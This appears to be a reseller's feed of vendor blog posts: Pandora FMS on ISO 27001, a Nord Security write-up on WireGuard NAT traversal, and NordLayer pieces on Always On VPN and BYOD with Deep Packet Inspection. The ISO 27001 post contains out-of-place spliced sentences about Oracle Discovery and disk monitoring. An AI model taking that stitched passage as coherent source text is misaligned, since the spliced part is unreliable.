Security is not a technology, it is a way of thinking and acting, we could even say that it is an attitude.

For years we have attended international fairs and events where computer security is offered as specific products.

Many people may think that by buying products you reinforce your company’s security, but no, that is only a small part of it.

Security is about changing the way we manage the whole organization, from how we share information to how we use systems.

Pandora FMS has always been aware of that and you may see it in our security architecture guide, our GDPR compliance guide -which is also valid for regulations such as PCI/DSS- and of course, because as a company we are certified with ISO 27001.

We don’t boast about it, but we are also one of the few commercial software vendors with a public vulnerability disclosure policy.

Certification ISO 27001 provides us with important backup towards our national and international clients, many of whom request information from us about our business continuity plans, the security of our development and implementation processes, what protection measures of information privacy we have in force and how we control the information available to our suppliers.

We understand that for them it is as important or even more than for us and having a certification that strongly supports us is something to be proud of.

Many of our clients are pharmaceutical companies, financial institutions – some over a century old – and government entities.

Due to confidentiality contracts we cannot mention their names, but large and small, to a greater or lesser extent, everyone is concerned about aspects related to information security.

Today we can proudly say that not only do we also care about it, but that we have proven our commitment.

But what is ISO/IEC 27001?

ISO/IEC 27001 is a standard for information security (Information technology – Security techniques – Information security management systems – Requirements) approved and published as an international standard in October 2005 by the International Organization for Standardization and by the International Electrotechnical Commission.

It specifies the necessary requirements to set, implement, maintain and improve an information security management system (ISMS) according to what is known as the “Cycle of Deming”:

PDCA – acronym for Plan, Do, Check, Act.

It is consistent with the best practices described in ISO/IEC 27002, formerly known as ISO/IEC 17799, with origins in the BS 7799-2: 2002 standard, developed by the British standards body, the British Standards Institution (BSI).

As you have seen, the Oracle tasks configured in Discovery allow you to connect to remote Oracle instances to monitor them and to generate module blocks with important information. Today we focus solely on Oracle, but it is necessary to emphasize that the Discovery menu also allows you to monitor other applications.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About PandoraFMS
Pandora FMS is a flexible monitoring system, capable of monitoring devices, infrastructures, applications, services and business processes.
Of course, one of the things that Pandora FMS can control is the hard disks of your computers.

Reaching beyond 1Gbps: How we achieved NAT traversal with vanilla WireGuard

Nord Security engineers have been hard at work developing Meshnet, a mesh networking solution that employs the WireGuard tunneling protocol. Here are the technical details on how we tackled the challenge of optimizing Meshnet’s speed.

Blog thumbnail photo

Meshnet is powered by NordLynx, a protocol based on Wireguard. WireGuard is an excellent tunneling protocol. It is open, secure, lightweight, lean, and – thanks to the in-kernel implementations like in the Linux kernel or the Windows NT kernel – really, really fast.

natblog1

An iperf3 speed test between NordVPN’s staging VPN servers with a single TCP connection tunneled over WireGuard.

At the heart of it is “cryptokey routing,” which makes creating a tunnel almost as easy as tracking a few hundred bytes of state. So having hundreds or even thousands of tunnels from a single machine is feasible.

These properties make WireGuard a very appealing building block for peer-to-peer mesh networks. But before getting there, a challenge or two must still be overcome. So let’s dig into them!

Ground rules

Here are ground rules to help us to better weigh tradeoffs. First, privacy and security is a priority, so any tradeoff compromising end-to-end encryption or exposing too much information is automatically off the table. Second, speed and stability is one of the most important qualities of Meshnet. Finally, to cover all major operating systems (Windows, Android, iOS, macOS, and Linux), any ideas or solutions must be implementable on those platforms.

So here are the ground rules:

Rule #1

Everything will be end-to-end encrypted. Any user data passing between devices must be inaccessible to anyone else – even to Nord Security itself.

Rule #2

No mixing of the data plane (i.e., the code that processes packets) and control plane (i.e., the code that configures the network), if possible. That’s because any additional logic (e.g., NAT traversal, packet filtering/processing) added to the WireGuard will slow it down.

Rule #3

No solutions that target a single WireGuard implementation. Remember those fast in-kernel implementations? In order to reach high throughput everywhere, we must be able to adapt to the intricacies of every platform.

Great! Now let’s get cracking!

NAT traversal 101

Every peer-to-peer application (including Meshnet) has a NAT traversal implementation at its heart. While this is a rather wide topic (just look at the amount of related RFCs: RFC3261, RFC4787, RFC5128, RFC8489, RFC8445, RFC8656…), the core principle is quite simple: NATs are generally designed to support outgoing connections really well.

They achieve this by forwarding any outgoing packets while remembering just enough information to be able to discern where and how to forward incoming response packets whenever they arrive. The exact nature of this information and how it is used will determine the type of the NAT and its specific behavior. For example, Linux NATs are based on the conntrack kernel module and one can easily check the state of this information at any moment using the conntrack -L command.

1

$ sudo conntrack -L

2

tcp 6 382155 ESTABLISHED src=192.168.3.140 dst=172.217.18.3 sport=60278 dport=443 src=172.217.18.3 dst=192.168.3.140 sport=443 dport=60278 [ASSURED] mark=0 use=1

3

tcp 6 348377 ESTABLISHED src=192.168.228.204 dst=35.85.173.255 sport=38758 dport=443 src=35.85.173.255 dst=192.168.228.204 sport=443 dport=38758 [ASSURED] mark=0 use=1

4

......
 

This great RFC4787 goes into a lot of detail about NAT behavior in general.

While outgoing connections are handled transparently, incoming connections can be trouble. Without outgoing packets forwarded first (and consequently without the conntrack information), NATs simply do not have any clue where to forward packets of incoming connections and the only choice left is to drop them. At this moment, we finally arrive at the core part of any peer-to-peer connection establishment:

Suppose you shoot a packet from both sides of the peer-to-peer connection at each other roughly at the same time. In this case, the connection will appear to be “outgoing” from the perspective of both NATs, allowing hosts to communicate.

Let’s unpack it a bit:

  • “Shoot a packet” – send a UDP packet. While there are techniques regarding other protocols, only UDP packets matter in this case, as WireGuard is UDP-based. The packet’s payload contents do not matter (it can even be empty), but it’s important to get the headers right.

  • “at each other” – the packet’s source and destination addresses and ports, transmitted from different sides of the connection, must mirror each other just after the first translation has been performed but before any translations by the second NAT occur. No matter what source address and port are being used by the NAT on the side for outgoing packets, the other side must send its packets to this exact address and port and vice versa. Unfortunately, some NATs make it very difficult to figure out the translations they are making, which is why NAT traversal is never 100% reliable.

  • “roughly at the same time” – the data about outgoing connections within a NAT isn’t stored forever, so the packet from the other side must reach the NAT before this data disappears. The storage time greatly depends on the NAT – it varies from half a minute to a few minutes.

blog how we achieved nat traversal with vanilla wireguard 2

An example NAT traversal scenario.

This technique is surprisingly general. Only small bits and pieces differ within the different cases a typical peer-to-peer application needs to support.

A few things need to be done right, but all of this is possible with vanilla WireGuard and the established ground rules. Take two packets and send them from the right source to the right destination at roughly the same time, without even worrying about what’s inside of the packets. How hard can it be? #FamousLastWords.

WG-STUN

The key part of any NAT traversal implementation is figuring out what translations will be performed by the NAT. In some cases, there is no NAT (e.g., host on the open internet), or it is possible to simply request a NAT to perform specific translations instead (e.g., by using UPnP RFC6970, PMP RFC6886). Sometimes, the translation has to be observed in action. Luckily, a standardized protocol STUN (RFC8489) does just that.

While there are some intricacies with the STUN protocol itself, the so-called STUN binding request is at its core. This binding request usually is formatted by the client behind NAT and processed by the server hosted on the open internet. Upon receiving this request, the server will look at the source IP address and port of the request packet and add it to the payload of the response packet.

A STUN binding request captured with Wireshark.

A few of the NATs will use the same translations of the source IP address regardless of the destination (let’s call them “friendly NATs”). The same source IP address and the source port will be used for the packets going to the STUN server and any Meshnet peer. But there is a catch! The same NAT translations will be performed only as long as the packets are using the same source IP and port for all destinations on the originating host.

Here’s the first challenge. Vanilla WireGuard is not capable of performing STUN requests on its own. Moreover, once WireGuard reserves a source port for communications with its peers, other programs cannot, generally, use it anymore.

While it is technically possible to add STUN functionality to WireGuard, it would be in violation of our ground rule #2 and would seriously complicate the relationship with the rule #3. The search continues.

The WireGuard protocol is designed to create IP tunnels. Maybe it’s possible to transmit STUN requests inside of the tunnel? That way, the STUN request would get encapsulated, resulting in two IP packets: inner (STUN) and outer (WireGuard). Luckily, according to the WireGuard whitepaper, all outer packets destined to any peer should reuse the same source IP and port:

Note that the listen port of peers and the source port of packets sent are always the same.

It’s been the behavior of all WireGuard implementations tested for this blog post.

Using this property, we can assume that packets destined for distinct WireGuard peers will get the same translations when going through friendly NATs. That’s precisely what we need when using an external service (like STUN) to determine which translations NAT will use when communicating with Meshnet peers.

But no standard STUN server can communicate with WireGuard directly. Even if we hosted a STUN server at the other end of the tunnel, after decapsulation, the server would respond with the inner packet’s source IP and port – but we the need outer packet’s source IP and port.

Say hello to WG-STUN, a small service that maintains WireGuard tunnels with clients and waits for STUN requests inside the tunnels. When a binding request arrives, instead of looking into the binding request packet, the STUN server takes the address from the WireGuard peer itself and writes it into the STUN binding response. Later, it encapsulates the packet according to WireGuard protocol and sends it back to the client. On the client side, to figure out what translations will be performed by the NAT for the WireGuard connections, we just need to add WG-STUN peer and transmit a standard STUN request inside the tunnel.

A Wireshark capture of a WG-STUN binding request.

In the picture above, you can see a standard WG-STUN request. In this case, a STUN request was sent to 100.64.0.4, which is a reserved IP for an in-tunnel STUN service. The request got encapsulated and transmitted by WireGuard to one of the WG-STUN servers hosted by Nord Security. This WG-STUN server is just a standard WireGuard peer with the allowed IP set to 100.64.0.4/32, and the endpoint pointed to the server itself.

 

A WG-STUN peer configured on Meshnet interface.

Note that the WG-STUN service is, by design, a small service that is functionally incapable of doing anything other than responding to STUN requests (and ICMP for reachability testing). This way, we are bounding this service to control-plane only and adhering to rule #2. Because the WG-STUN service is just a standard peer, WireGuard’s cross-platform interface is more than enough to control the WG-STUN peer in any of the WireGuard implementations (rule #3), Most importantly, due to WireGuard’s encryption, we get privacy and security by default (rule #1).

Path selection

Now we can perform STUN with vanilla WireGuard and figure out some translations which NAT will perform, provided that our NAT is friendly NAT. Unfortunately, that’s not enough to ensure good connectivity with Meshnet peers. What if there is no NAT at all? What if two NATs are in a chain, and our Meshnet peer is between them? What if a Meshnet peer is running in the VM of a local machine? What if a Meshnet peer managed to “ask” its NAT for specific translations via UPnP? There are quite a few possible configurations here. Sometimes we call these configurations “paths,” describing how one Meshnet peer can reach another. In the real world, the list of potential paths is a lot longer than the list of paths that can sustain the peer-to-peer connection.

 

For example, one Meshnet peer may access the other directly if both are within the same local area network. What’s more, if NAT supports hair-pinning, the same peer may be accessed via the WAN IP address of the router too. Additionally, it is common for a single host to participate in multiple networks at the same time (e.g., by virtualized networks, using multiple physical interfaces, DNATing, etc.). But it is impossible to know in advance which paths are valid and which are not.

For this reason, peer-to-peer applications usually implement connectivity checks to determine which paths allow peers to reach one another (e.g., checks standardized in ICE (RFC8445), and when multiple paths pass the checks, they select the best one. These checks are usually performed in the background, separate from a data channel, to avoid interfering with the currently in-use path. For example, if two peers are connected via some relay service (e.g., TURN RFC8656), an attempt to upgrade to a better path (e.g., direct LAN), which is not validated, may cause path interruption until timeout passes and that would be deeply undesirable.

While WireGuard implementations indicate the reachability of currently configured peers used for the data plane, the lightweight nature of the WireGuard protocol makes alternative path evaluation out of scope. The question is: how can we separate the data plane from connectivity checks?

Considering the affordable nature of WireGuard tunnels, the most straightforward solution would be to configure two pairs of peers on each Meshnet node – one for the data plane, the other for connectivity checks. But this solution is not feasible in practice. WireGuard peers are identified by their identity (public key), and each interface has only one identity. Otherwise, cryptokey routing and roaming functionality, in its current form, would break. Moreover, mobile platforms can have at most one interface open at any moment, restricting Meshnet nodes to a single identity at a given time.

So let’s look for solutions elsewhere. Here’s how we came to the observation which is now the core principle for performing connectivity checks out of the data plane:

Given that a connection can be established using a pair of endpoints – it is highly likely that performing the same steps with a different source endpoint will succeed.

It is possible to force this observation not to be true, but it wouldn’t be a natural occurrence. NATs will have the same mapping and filtering behavior for any pair of distinct outgoing connections. RFC4787 considers NAT determinicity as a desirable property. UPnP RFC6970, PMP RFC6886, and similar protocols will behave similarly for distinct requests. LAN is almost never filtered on a per-source-port basis for outgoing connections.

On the other hand, making such an assumption allows us to completely separate connectivity checks and the data plane. After performing a connectivity check out-of-band, a path upgrade can be done with a high degree of certainty of success.

Therefore, in our Meshnet implementation, Meshnet nodes gather endpoints (as per ICE (RFC8445) standard) for two distinct purposes. First, to perform connectivity checks, and second, to upgrade the WireGuard connection in case connectivity checks succeed. Once the list of endpoints is known, the endpoints are exchanged between participating Meshnet nodes using relay servers. For privacy and security, the endpoint exchange messages are encrypted and authenticated using the X25519 ECDH algorithm and ChaCha20Poly1305 for AEAD. Afterward, the connectivity checks are performed separately from WireGuard using plain old UDP sockets. If multiple endpoint candidates succeed in the connectivity check, the candidate with the lowest round-trip time is preferred.

We have validated a path using some pair of endpoints, so the corresponding data plane endpoints are selected, and a path upgrade is attempted. If the upgrade fails to establish a connection, it is banned for a period of time, but if it succeeds → we have successfully established a peer-to-peer connection using vanilla WireGuard.

And now we can fire up iperf3 and measure what it means. As you may have realized, we are now measuring vanilla WireGuard itself. For example, running two Meshnet nodes in docker containers on a single, rather average laptop equipped with Intel i5-8265U without any additional tweaking or tuning, we can easily surpass the 2Gbps mark for single TCP connection iperf3 test.

natblog9

iperf3 single TCP connection test between two Meshnet nodes.

At the time of writing, the default WireGuard implementation used by Meshnet for Linux is the Linux kernel, Windows – WireGuard-NT or WireGuard-go, and for other platforms – boringtun.

Conclusion

By solving a few challenges, Nord Security’s Meshnet implementation managed to build a Meshnet based on WireGuard with peer-to-peer capabilities using only an xplatform interface and the benefits of in-kernel WireGuard implementations. It surpassed the 1Gbps throughput mark. Currently, the implementation is in the process of being released, so stay tuned for a big speed upgrade!

Note: WireGuard and the “WireGuard” logo are registered trademarks of Jason A. Donenfeld.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

NordLayer feature release: Always On VPN

NordLayer introduces a new addition to the security stack of the solution — Always On VPN. Our most recent feature will provide a VPN-only connection to digital organization resources and online browsing. It’ll also ensure IP masking and encryption endure despite where and when the user accesses internal and public information.

Always On VPN provides a peripheral security layer for a robust and reactive approach to protecting company assets and users in a continuously evolving technological landscape.

Feature characteristics: what to expect

  • Available for all subscription plans.

  • Central implementation & configuration via Control Panel;
    Individual configuration level via application settings.

  • Compatible with desktop platforms: Windows; macOS (side-loaded version only).

Problem to solve: ensure continuous and secure internet access by disabling unencrypted user connections.

How does it work?

Always On VPN enforces mandatory connection to a company gateway to use the internet. As the feature name implies, user connectivity to the network could resume only with VPN turned on.

Users with the enabled feature are relieved from connecting to the VPN manually. Automation doesn’t require remembering to turn on the encrypted connection while working, which otherwise imposes risks to company data security.

Always On VPN is deployed and starts functioning on an organization member device from the moment the user signs in to their endpoint with the enforced feature on the NordLayer Application.

Primarily enforced security policy ensures organization members follow company security requirements and follow internal rules.

IT administrators activate security configuration via Control Panel. The On/Off toggle for the Always On VPN is under the Settings category, Security configurations tab. It allows admins to manage the policy centrally and distribute it to the entire organization.

Employees can enable and disable the feature on the NordLayer application settings as long as the admin doesn’t activate it. Thus, if the IT administrator wants to ensure everyone in the organization has Always On VPN enforced, end users won’t be able to disable it once configured centrally via Control Panel.

What problem does it solve?

IT managers must be sure that organization members use cybersecurity tools according to internal security procedures. Skilled IT staff and resource limitations require maximum efficiency from deployed cybersecurity strategy with consolidated access controls.

The feature of Always On VPN helps admins ensure all company members’ online activities are within organizational security policies. In the meantime, organizations benefit from a tighter approach to prevent data leaks and breaches.

Always On VPN objectives include:

  1. Enforcement of connection encryption for a remote workforce.

  2. Protection of teams on the move (covers business trips, frequent exposure to public wifi).

  3. Enhancement of data leak prevention for increased-risk companies.

With the Always On VPN feature running, organizations can expect higher reliability to remote connections outside the office network perimeter.

Security by design

The Always On VPN interconnects with other NordLayer features. It is an additional security layer for protecting user internet access while connected to the company network. Always On VPN ensures encrypted user traffic is isolated from untrusted network threats once a secure connection is lost.

The feature syncs with NordLayer’s Device Posture Monitoring for providing information about organization-linked endpoint health and activity. ThreatBlock feature helps filter out potentially malicious websites users might enter while connected to the company gateway. Also, Always On VPN ensures that DNS Filtering and Deep Packet Inspection features operate per applied settings.

Combined features enforce security through user endpoints and don’t affect employee productivity. And don’t expose your business to online risks within seconds after IT admins enforce it centrally despite their location, distance, and distribution.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

Enabling all ways of working with BYOD

Companies have the most varying takes on protecting their assets and teams. Some businesses have strict internal policies like allowing wire-only peripherals, and others force computer shutdown at the end of the working day.

However, rigid restrictions are challenging to keep up with and follow if not monitored closely, especially in hybrid environments. Remote workers, freelancers, teams on different sites, and mobile employees like consultants and salespeople extend a single-location office’s borders.

The fast pace of businesses and information flow often requires being present and removing any obstacles that disconnect employees from being out of reach. It brings us to people using their own devices in the workplace and its extended modern version.

Should organizations encourage using other than corporate-issued endpoints? And how can you manage the risks that come with them? This article will look closely into securing flexible setups of all ways of working.

Focus definitions

  • Bring Your Own Device (BYOD) is an organizational policy allowing employees to work or access corporate data and applications using or linking personal devices like computers and/or smartphones.

  • Deep Packet Inspection (DPI) is a packet filtering feature that examines data pieces against admin-defined security policies and forbidden keywords to block the information from entering the network.

BYOD in the workplace

In the modern world, incorporating employee-owned devices into the company’s technological ecosystem often rolls out with the daily operations flow. The growing tech literacy and availability influence the use of personal devices at work.

Some organizations have an unwritten rule that employees must be within reach after working hours, even though it’s not included in their job description. Or how can you quickly solve a situation when you must join a work meeting, but a corporate-issued PC just started a mandatory OS update?

Real-life situations normalize personal phones or laptops for daily or occasional use. Yet, it allows companies to save expenses for supplying extra cell phones to the staff. And the workforce is already familiar with personal phones and laptops, which allows for skipping training and adjustment periods without affecting productivity.

The BYOD strategy relieves employees from owning +1 or more devices that aren’t necessary and turns into gadget pollution. Besides, employee-owned devices are more likely to be in use and thus up to date. 

Data insights: BYOD policy adoption

According to BYOD Security Report 2022, the vast majority — 82% of organizations have a policy that allows staff to use their own devices, at least to some extent. Although BYOD is mainly considered an employee-related topic, contractors, partners, customers, and suppliers also can become unmanaged-device sources to the organization.

BYOD adoption in organizations 1400x658
Companies with a BYOD strategy record major benefits for organizations and the workforce. Employees using their own devices at work are more satisfied as they aren’t attached to an additional piece of technology that needs to be mastered. It boosts productivity and flexibility with a cost-saving approach.

Effectivity of BYOD 1400x658
However, convenience has its price. BYOD policy in an organization exposes it to a broader spectrum of risks. An employee manages non-company-issued devices, thus, contents and activity are much more challenging to supervise. 

Risks of BYOD

The idea behind the bring your own device is to incorporate unmanaged user devices into the company network as supportive work tools. Technically, it becomes a security gap as such endpoints aren’t supervised if no security measures are enforced. To what risks do pre-owned user devices expose the organization?

Unknown end-user

A personal device doesn’t mean it is completely accessed only by its owner. If no lock pattern exists, family members, friends, or anyone can use the endpoint, which easily can lead to a data breach or leak. 

Device loss

Taking your laptop or phone outside the office increases the risk of lost or stolen devices. Any hardware containing business-sensitive information compromises data security as it can be extracted or accessed with little effort.

Non-trusted apps and networks

Individual devices mean personal activities. Work-related apps, communication channels, and email accounts mix with entertainment software (at times consisting of surveillance or malicious elements), streaming services, free-roam browsing, and potential for phishing attacks. 

Security features to support BYOD

Preventive measures like single sign-on or multi-factor authentication, network segmentation, and rooted-device detection help manage various risks of BYOD.

Integration of a solution to block external threats makes internet browsing safer for users with pre-owned endpoints. NordLayer’s ThreatBlock feature enriches DNS filtering by screening connection inquiries against libraries of malicious sites and blocklisting them from visiting.

Besides only focusing on protecting the device, encryption of communication channels is a strong addition to BYOD strategy enforcement. Modern AES 256-bit encryption used in internet protocols like NordLynx encodes traveling data. It ensures the confidentiality of sensitive business information when connected to untrusted networks.

Another way to ensure device compliance with organizational security policies is to enable auto-connection to the company’s Virtual Private Network (VPN) once an internet connection is detected and use always-on VPN features. Automatization minimizes the human error vulnerability so users can’t ‘forget’ to switch their devices to the required gateway when accessing company resources.

Let’s shift from the n+1 possible strategies of enabling BYOD policy and, this time, dig deeper into one of the most prominent security functionalities – Deep Packet Inspection (DPI) – that controls what’s entering the company network despite the source of the endpoint.

What is DPI?

Deep Packet Inspection helps protect the company network by filtering out harmful or unwanted sites and applications. It scans data packets of traveling information against flagged keywords and website categories. Unlike DNS filtering, which filters only website data, DPI goes above browser-level restrictions and inspects data on the applications and device levels.

DPI processes packet filtering that may contain malicious elements leading to intrusions and viruses. Alternatively, it allows blocking out sources incompatible with work productivity, like gaming or streaming sites.

In short, the feature serves network management by controlling what ports and protocols employees can access while connected to the company gateways, effectively securing the devices as DPI inspects not only the headers but also the contents of data packets.

How does DPI enable the flexibility of BYOD policy?

In the post-pandemic era, companies are calibrating which approach – remote or on-site – works best for their organizational culture. Ultimately it shows a clear tendency for the application of hybrid work variations. Meaning the BYOD policy is implicit in such companies.

Securing remote workforces

Physical distance is the main attribute of remote work. Traveling and remote employees and freelancers are the driving force for implementing the BYOD policy since acquiring hands-on staff is easier and cheaper.

Removing the office-based restrictions of a controlled network prevents IT administrators from actively monitoring the company infrastructure within a contained perimeter. In this case, the security focus can shift from the actor to the conditions of the environment they operate in.

DPI is based on a set of rules that admins impose collectively for the whole organization or teams and selected users. They can define restrictions on what content can’t enter the company network while connected to the organization gateway.

Blocking specific ports and protocols aid security strategy by stopping:

  • Downloading file-sharing applications 

  • Accessing malicious websites that may inject malware

  • Falling victim to a man-in-a-middle attack while connected to public wifi

  • Entering links with phishing attempts

  • Installing shadow add-ons and software

  • (Un)voluntary data leaking

Office security enhancement

It is easier to manage on-premise work until it turns to online browsing. Dozens of open tabs, links, and distractions on the internet require additional precautions to improve productivity within the office borders.

DPI solution enables IT administrators to manage access to online resources that tend to impact employee effectiveness daily.

First, an organization can simply deny access to streaming, gaming, and secondary websites unrelated to performing job tasks. Less Youtube, Twitch, or Netflix streaming in the background, more focus on performance quality.

Secondly, unnecessary internet traffic slows down the bandwidth within the office. Slow connections disrupt the intended workflow, put pressure on infrastructure, and result in poor user experience. DPI feature allows IT admins to eliminate traffic overload on the company network. 

Enabling secure BYOD with NordLayer

NordLayer introduced Deep Packet Inspection (Lite) security feature focusing on the most tangible organization pain points with hybrid setups. Security and productivity are the priorities of a business; thus, DPI Lite seals the security vulnerabilities, whether you try managing globally spread teams and freelancers or unlocking workforce performance. 

NordLayer’s DPI Lite is one of the many security layers that, combined with other network management features like DNS filtering and IAM integrations, solidify any cybersecurity approach — and help you find the most straightforward way to improve your organizational security.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.